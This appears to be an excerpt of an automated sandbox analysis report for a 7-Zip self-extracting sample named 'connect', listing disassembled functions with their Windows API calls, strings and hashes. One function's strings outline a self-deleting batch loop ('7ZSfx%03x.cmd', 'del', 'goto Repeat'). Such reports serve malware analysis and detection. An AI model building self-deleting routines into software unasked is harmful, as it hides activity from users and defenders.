                                                            • ClientToScreen.USER32(00000000,?), ref: 00409172
                                                            • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 004091D8
                                                            • GetClientRect.USER32(?,?), ref: 00409262
                                                              • Part of subcall function 004097BC: GetDlgItem.USER32(?,00000020), ref: 004097DA
                                                              • Part of subcall function 004097BC: SetWindowPos.USER32(00000000,?,00409511,?,?,?,?,?,00000000,?,?,75C08FB0,?,?,?,00000020), ref: 004097E1
                                                            • ClientToScreen.USER32(00000000,?), ref: 00409179
                                                              • Part of subcall function 0040843F: GetDlgItem.USER32(?,?), ref: 0040844B
                                                            • GetSystemMetrics.USER32(00000008), ref: 004092EF
                                                            • GetSystemMetrics.USER32(00000007), ref: 004092F6
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: MetricsSystem$ClientItemWindow$LongRectScreen$Parent
                                                            • String ID:
                                                            • API String ID: 747815384-0
                                                            • Opcode ID: 6010b5586e3160ba8506d96e14723b5042423bcce0cb31885f0b4684bd6ec028
                                                            • Instruction ID: c632412a5a33fa474f1902e8d818173d360f4408f818f46c608f4226bc3f0ad5
                                                            • Opcode Fuzzy Hash: 6010b5586e3160ba8506d96e14723b5042423bcce0cb31885f0b4684bd6ec028
                                                            • Instruction Fuzzy Hash: 61A17471E00215AFDF10CFA9CD85AAEBBB9EF88710F194169E900F7285D774ED018BA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405A7A Relevance: 22.9, APIs: 6, Strings: 7, Instructions: 144fileCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDriveTypeW.KERNEL32(?), ref: 00405AC1
                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00405AF4
                                                            • WriteFile.KERNEL32(00000000,00000000,?,?,00000000), ref: 00405BA6
                                                            • CloseHandle.KERNEL32(00000000), ref: 00405BB8
                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00405BCE
                                                            • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00405BE0
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCloseCreateDriveExecuteHandleShellTypeWrite
                                                            • String ID: "$" goto Repeat$7ZSfx%03x.cmd$:Repeat$del "$if exist "$open
                                                            • API String ID: 3376544914-3467708659
                                                            • Opcode ID: e87a570bc3bc16d1c606f5509409edd029b9275b928d07d20fb1c4806b1bf4d9
                                                            • Instruction ID: 92ed7352b11ff46a90e83ca7b99ef020e3a2c8ebe3b5ebfa04c81b2b9a9db43e
                                                            • Opcode Fuzzy Hash: e87a570bc3bc16d1c606f5509409edd029b9275b928d07d20fb1c4806b1bf4d9
                                                            • Instruction Fuzzy Hash: 3C416472900119AECB14EFA1DD86DEF7B78EF04314F50406AF601B61E1DB746E85DBA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004206C5 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 00420709
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 004202BE
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 004202D0
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 004202E2
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 004202F4
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 00420306
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 00420318
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 0042032A
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 0042033C
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 0042034E
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 00420360
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 00420372
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 00420384
                                                              • Part of subcall function 004202A1: _free.LIBCMT ref: 00420396
                                                            • _free.LIBCMT ref: 004206FE
                                                              • Part of subcall function 0041D8BA: HeapFree.KERNEL32(00000000,00000000,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?), ref: 0041D8D0
                                                              • Part of subcall function 0041D8BA: GetLastError.KERNEL32(?,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?,?), ref: 0041D8E2
                                                            • _free.LIBCMT ref: 00420720
                                                            • _free.LIBCMT ref: 00420735
                                                            • _free.LIBCMT ref: 00420740
                                                            • _free.LIBCMT ref: 00420762
                                                            • _free.LIBCMT ref: 00420775
                                                            • _free.LIBCMT ref: 00420783
                                                            • _free.LIBCMT ref: 0042078E
                                                            • _free.LIBCMT ref: 004207C6
                                                            • _free.LIBCMT ref: 004207CD
                                                            • _free.LIBCMT ref: 004207EA
                                                            • _free.LIBCMT ref: 00420802
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: 1e5723d25d53dd34ca643d94fd98a225f049ee2017e098510fc2e6e4f07d8627
                                                            • Instruction ID: f0e553c9e8343717a0a7b969cb5d34bc98da930babeb4e51af295b5064f8747a
                                                            • Opcode Fuzzy Hash: 1e5723d25d53dd34ca643d94fd98a225f049ee2017e098510fc2e6e4f07d8627
                                                            • Instruction Fuzzy Hash: BF313C71A002149FEB21AB39E845B97B3E9BF40315F50442BE459D6292DBBDBC80CB1C
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041F8DC Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 202COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: _free$___from_strstr_to_strchr
                                                            • String ID: (3k
                                                            • API String ID: 3409252457-3876852650
                                                            • Opcode ID: c7a94b45f35301d2f4b497baa772962acfc0f97d7eb98f0e9f5df19cec1c5ace
                                                            • Instruction ID: fdbf306c64a7c8e7d47248ea4e3c8a392b46f6218617ea4e7a9b4b0eb2763b88
                                                            • Opcode Fuzzy Hash: c7a94b45f35301d2f4b497baa772962acfc0f97d7eb98f0e9f5df19cec1c5ace
                                                            • Instruction Fuzzy Hash: 08513AB1E04201AFDB10AF65C851AEE7BA4EF01354F10417FE81497281EB7D95CAC79D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00407D9B Relevance: 16.6, APIs: 11, Instructions: 91windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetParent.USER32(?), ref: 00407DA8
                                                            • GetWindowLongW.USER32(00000000), ref: 00407DAF
                                                            • DefWindowProcW.USER32(?,?,?,?), ref: 00407DC6
                                                            • CallWindowProcW.USER32(?,?,?,?,?), ref: 00407DEB
                                                            • GetSystemMetrics.USER32(00000031), ref: 00407DFC
                                                            • GetSystemMetrics.USER32(00000032), ref: 00407E03
                                                            • GetWindowDC.USER32(?), ref: 00407E14
                                                            • GetWindowRect.USER32(?,?), ref: 00407E21
                                                            • DrawIconEx.USER32(00000000,?,?,?,?,?,?,?,00000003), ref: 00407E56
                                                            • ReleaseDC.USER32(?,00000000), ref: 00407E5E
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Window$MetricsProcSystem$CallDrawIconLongParentRectRelease
                                                            • String ID:
                                                            • API String ID: 2586545124-0
                                                            • Opcode ID: 13315dc566440e7873623460b0985ad812db8e2c3297466bf6bad93b447df2c8
                                                            • Instruction ID: 32c8ee591f6a75049be7983eb7663823e757bc500077958c5c7cf1faa07ade31
                                                            • Opcode Fuzzy Hash: 13315dc566440e7873623460b0985ad812db8e2c3297466bf6bad93b447df2c8
                                                            • Instruction Fuzzy Hash: EA313876A00209BFCB11DFA8DD88DAF7BB9FB48750F414165F901A62A0C734EE11DB65
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00408DC9 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 77windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00408CE3: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 00408D46
                                                              • Part of subcall function 00408CE3: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00000103), ref: 00408D62
                                                              • Part of subcall function 00408CE3: GetDlgItem.USER32(?,000004B7), ref: 00408D75
                                                              • Part of subcall function 00408CE3: SetWindowLongW.USER32(00000000,000000FC,Function_00007D9B), ref: 00408D83
                                                              • Part of subcall function 00409D11: GetDlgItem.USER32(?,?), ref: 00409D20
                                                              • Part of subcall function 00409D11: ShowWindow.USER32(00000000,?,?,00408A44,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00409D38
                                                              • Part of subcall function 0040843F: GetDlgItem.USER32(?,?), ref: 0040844B
                                                            • GetDlgItem.USER32(?,000004B6), ref: 00408E10
                                                            • DestroyWindow.USER32(00000000), ref: 00408E13
                                                            • CreateWindowExA.USER32(00000200,Edit,004278FE,500100A0,?,?,?,?,?,000004B6,00000000,00000000), ref: 00408E4D
                                                            • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 00408E60
                                                            • GetDlgItem.USER32(?,000004B6), ref: 00408E6F
                                                            • SendMessageW.USER32(00000000,00000030,00000000,00000001), ref: 00408E77
                                                            • GetDlgItem.USER32(?,000004B6), ref: 00408E84
                                                            • SetFocus.USER32(00000000), ref: 00408E87
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Item$Window$MessageSend$CreateDestroyDirectoryFileFocusInfoLongShowSystem
                                                            • String ID: Edit
                                                            • API String ID: 2563414232-554135844
                                                            • Opcode ID: 3ca9707fea54dbec7de80c806e1157ff2d61b2f5687ea0a5ee209b53e799012e
                                                            • Instruction ID: 6d633ca7e672683e2539274c03935dd34f52b8824e58e3a08f9cf6f2533a953c
                                                            • Opcode Fuzzy Hash: 3ca9707fea54dbec7de80c806e1157ff2d61b2f5687ea0a5ee209b53e799012e
                                                            • Instruction Fuzzy Hash: 73218471A00208BFDB11DBA5CD89EAFBBBDEF88B40F414029F604B3191CB749D008B68
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00408E94 Relevance: 15.1, APIs: 10, Instructions: 100COMMON
                                                            Download Yara Rule
                                                            APIs
                                                              • Part of subcall function 00408775: GetModuleHandleW.KERNEL32(00000000,00000065), ref: 00408798
                                                              • Part of subcall function 00408775: LoadIconW.USER32(00000000), ref: 0040879F
                                                              • Part of subcall function 00408775: GetSystemMetrics.USER32(00000032), ref: 004087B1
                                                              • Part of subcall function 00408775: GetSystemMetrics.USER32(00000031), ref: 004087B6
                                                              • Part of subcall function 00408775: GetModuleHandleW.KERNEL32(00000000,00000065,00000001,00000000), ref: 004087BF
                                                              • Part of subcall function 00408775: LoadImageW.USER32(00000000), ref: 004087C6
                                                              • Part of subcall function 00408775: SendMessageW.USER32(?,00000080,00000001,00000000), ref: 004087E4
                                                              • Part of subcall function 00408775: SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004087F1
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 0040880D
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 00408819
                                                              • Part of subcall function 00408775: GetWindowLongW.USER32(00000000,000000F0), ref: 00408820
                                                              • Part of subcall function 00408775: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00408835
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B5), ref: 00408842
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B5), ref: 00408852
                                                              • Part of subcall function 00408775: GetWindowLongW.USER32(00000000,000000F0), ref: 0040885D
                                                              • Part of subcall function 00408775: SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 0040886C
                                                              • Part of subcall function 00408775: GetDlgItem.USER32(?,000004B2), ref: 00408882
                                                              • Part of subcall function 00409D11: GetDlgItem.USER32(?,?), ref: 00409D20
                                                              • Part of subcall function 00409D11: ShowWindow.USER32(00000000,?,?,00408A44,000004B1,00000000,?,?,?,?,000004B4,00000000,000004B3,00000000,?,00000000), ref: 00409D38
                                                              • Part of subcall function 0040843F: GetDlgItem.USER32(?,?), ref: 0040844B
                                                            • ClientToScreen.USER32(?,?), ref: 00408EE6
                                                            • GetWindowRect.USER32(?,?), ref: 00408EF9
                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000006), ref: 00408F11
                                                            • SetWindowLongW.USER32(?,000000F0,00800000), ref: 00408F27
                                                            • SetWindowLongW.USER32(?,000000EC,00000008), ref: 00408F30
                                                            • GetWindowRect.USER32(?,?), ref: 00408F39
                                                              • Part of subcall function 004097BC: GetDlgItem.USER32(?,00000020), ref: 004097DA
                                                              • Part of subcall function 004097BC: SetWindowPos.USER32(00000000,?,00409511,?,?,?,?,?,00000000,?,?,75C08FB0,?,?,?,00000020), ref: 004097E1
                                                            • GetDlgItem.USER32(?,000004B2), ref: 00408F66
                                                            • GetDlgItem.USER32(?,000004B2), ref: 00408F75
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 00408F7C
                                                            • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00408F8B
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: Window$Item$Long$HandleLoadMessageMetricsModuleRectSendSystem$ClientIconImageScreenShow
                                                            • String ID:
                                                            • API String ID: 1121484998-0
                                                            • Opcode ID: 1cdce4adc764c7f088d0ee6d730f600d7813845618ebbd284a670f2826c691e1
                                                            • Instruction ID: 9e74c93de23cf570c17e1b5a08439b3f17f75c0aa34f920750d64279ea0233c6
                                                            • Opcode Fuzzy Hash: 1cdce4adc764c7f088d0ee6d730f600d7813845618ebbd284a670f2826c691e1
                                                            • Instruction Fuzzy Hash: CB311EB1A00119BFDB11DBA9CD85EAEBBB9FF48310F144125F914F3291CB74AD118BA8
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0041D339 Relevance: 15.1, APIs: 10, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _free.LIBCMT ref: 0041D34F
                                                              • Part of subcall function 0041D8BA: HeapFree.KERNEL32(00000000,00000000,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?), ref: 0041D8D0
                                                              • Part of subcall function 0041D8BA: GetLastError.KERNEL32(?,?,00420432,?,00000000,?,00000000,?,00420459,?,00000007,?,?,0042085D,?,?), ref: 0041D8E2
                                                            • _free.LIBCMT ref: 0041D35B
                                                            • _free.LIBCMT ref: 0041D366
                                                            • _free.LIBCMT ref: 0041D371
                                                            • _free.LIBCMT ref: 0041D37C
                                                            • _free.LIBCMT ref: 0041D387
                                                            • _free.LIBCMT ref: 0041D392
                                                            • _free.LIBCMT ref: 0041D39D
                                                            • _free.LIBCMT ref: 0041D3A8
                                                            • _free.LIBCMT ref: 0041D3B6
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast
                                                            • String ID:
                                                            • API String ID: 776569668-0
                                                            • Opcode ID: 159f680e33d9f79aaa113224bbcf6e0f3923927abfab0cce4d6b2ef038fb45ee
                                                            • Instruction ID: e367185f230cf175e0bcaf7a2e1da13122720bedc4ffbe012fdc2dba95469968
                                                            • Opcode Fuzzy Hash: 159f680e33d9f79aaa113224bbcf6e0f3923927abfab0cce4d6b2ef038fb45ee
                                                            • Instruction Fuzzy Hash: 0621A7B6D00108AFDB01EF95C891DDEBBB9FF08345F0081AAF5159B221DB75DA95CB88
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 0040197D Relevance: 13.8, APIs: 1, Strings: 8, Instructions: 346stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlenW.KERNEL32(006C2BF0), ref: 0040199A
                                                              • Part of subcall function 00404995: lstrlenW.KERNEL32(?,006C2BF2,00000000,?,00401A2E,006C2BF2,004269A0), ref: 0040499D
                                                              • Part of subcall function 00404995: lstrlenW.KERNEL32(?,?,00401A2E,006C2BF2,004269A0), ref: 004049A9
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: lstrlen
                                                            • String ID: BeginPromptTimeout$GUIFlags$GUIMode$MiscFlags$OverwriteMode$SelfDelete$SfxVarCmdLine1$bpt
                                                            • API String ID: 1659193697-507222989
                                                            • Opcode ID: 453c9c42458ea379abe1aae73ddc729c49ca3f67f324b9ee7c8da57b890cf8da
                                                            • Instruction ID: b7f53674935df98c98da0a44345d7be46f2990e0f6702e27673392295db007e3
                                                            • Opcode Fuzzy Hash: 453c9c42458ea379abe1aae73ddc729c49ca3f67f324b9ee7c8da57b890cf8da
                                                            • Instruction Fuzzy Hash: A0A15772604215A9DB24EBA5E852AFF73B8AB50714FA0403FF041B61F0EB7D9D82D21D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00409AFD Relevance: 13.6, APIs: 9, Instructions: 98stringwindowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • wvsprintfW.USER32(?,00000000,?), ref: 00409B21
                                                            • GetLastError.KERNEL32(?,0000FDE9,00000000), ref: 00409B31
                                                            • FormatMessageW.KERNEL32(00001100,00000000,00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00409B59
                                                            • FormatMessageW.KERNEL32(00001100,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00409B70
                                                            • lstrlenW.KERNEL32(?,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00409B83
                                                            • lstrlenW.KERNEL32(00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00409B8A
                                                            • lstrcpyW.KERNEL32(00000000,?), ref: 00409BB6
                                                            • lstrcpyW.KERNEL32(00000002,00000000), ref: 00409BC9
                                                            • LocalFree.KERNEL32(00000000,?,00000000,00000000,00000000,?,0000FDE9,00000000), ref: 00409BDC
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: FormatMessagelstrcpylstrlen$ErrorFreeLastLocalwvsprintf
                                                            • String ID:
                                                            • API String ID: 4146474141-0
                                                            • Opcode ID: 2315ee4240eef3a5fd566099b7850d6959c3581f514a6eb0293e743c75f1db6f
                                                            • Instruction ID: 26fe321a3274603042a3941b15e792db46d0e5a95a6efab40b32ee501e362044
                                                            • Opcode Fuzzy Hash: 2315ee4240eef3a5fd566099b7850d6959c3581f514a6eb0293e743c75f1db6f
                                                            • Instruction Fuzzy Hash: 7C2184B2500108BEDB15DF65DC89DEB3B6CEB04394F10407BF505961A0EA74AE45CBA4
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004096E4 Relevance: 13.5, APIs: 9, Instructions: 47windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetDlgItem.USER32(?,000004B3), ref: 004096FA
                                                            • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 0040970C
                                                            • GetDlgItem.USER32(?,000004B4), ref: 00409716
                                                            • SendMessageW.USER32(00000000,000000F4,00000000,00000001), ref: 00409722
                                                            • SendMessageW.USER32(?,00000401,?,00000000), ref: 00409731
                                                            • GetDlgItem.USER32(?,?), ref: 00409739
                                                            • SendMessageW.USER32(00000000,000000F4,00000001,00000001), ref: 00409745
                                                            • GetDlgItem.USER32(?,?), ref: 0040974D
                                                            • SetFocus.USER32(00000000,?,?,004088F9,000004B4,000004B3,00000000,000004B4,00000000,?,00000000), ref: 00409750
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: ItemMessageSend$Focus
                                                            • String ID:
                                                            • API String ID: 3946207451-0
                                                            • Opcode ID: c0990d19b43208d4d8c318df05fad4ee7bc9c2afa75e2af5abce2a1fe7552fd6
                                                            • Instruction ID: 7289477ae7c8e59e64be21adb5cea8fd92b758f8a7879ccb231af20fb948f028
                                                            • Opcode Fuzzy Hash: c0990d19b43208d4d8c318df05fad4ee7bc9c2afa75e2af5abce2a1fe7552fd6
                                                            • Instruction Fuzzy Hash: ABF0E171780318BAEF312B52DD4AF867E1ADB44B50F058061BB086E0E1CAF6D450DE64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00419470 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 144COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _ValidateLocalCookies.LIBCMT ref: 0041949B
                                                            • ___except_validate_context_record.LIBVCRUNTIME ref: 004194A3
                                                            • _ValidateLocalCookies.LIBCMT ref: 00419531
                                                            • __IsNonwritableInCurrentImage.LIBCMT ref: 0041955C
                                                            • _ValidateLocalCookies.LIBCMT ref: 004195B1
                                                            • RtlUnwind.KERNEL32(?,004195E9,00000000,00000000,?,00000001,?,?), ref: 004195E3
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000010.00000002.2573744570.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000010.00000002.2573719017.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573780579.0000000000426000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573808575.0000000000430000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                            • Associated: 00000010.00000002.2573843030.0000000000436000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_16_2_400000_connect.jbxd
                                                            Similarity
                                                            • API ID: CookiesLocalValidate$CurrentImageNonwritableUnwind___except_validate_context_record
                                                            • String ID: csm
                                                            • API String ID: 2164997444-1018135373
                                                            • Opcode ID: 98d011fd85a43c43195082c4c331a370ed1cfa35abd3f11007cd7c76bea82d12
                                                            • Instruction ID: 79ae2a4567aa8e04c6265be7f1f0a888140857a70f349d61d8ea1e17c7dfc9ea
                                                            • Opcode Fuzzy Hash: 98d011fd85a43c43195082c4c331a370ed1cfa35abd3f11007cd7c76bea82d12
                                                            • Instruction Fuzzy Hash: C341F635A01208BBCF11DF69D860ADE7BB5EF45328F14816BE8146B351D739DE82CB94
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

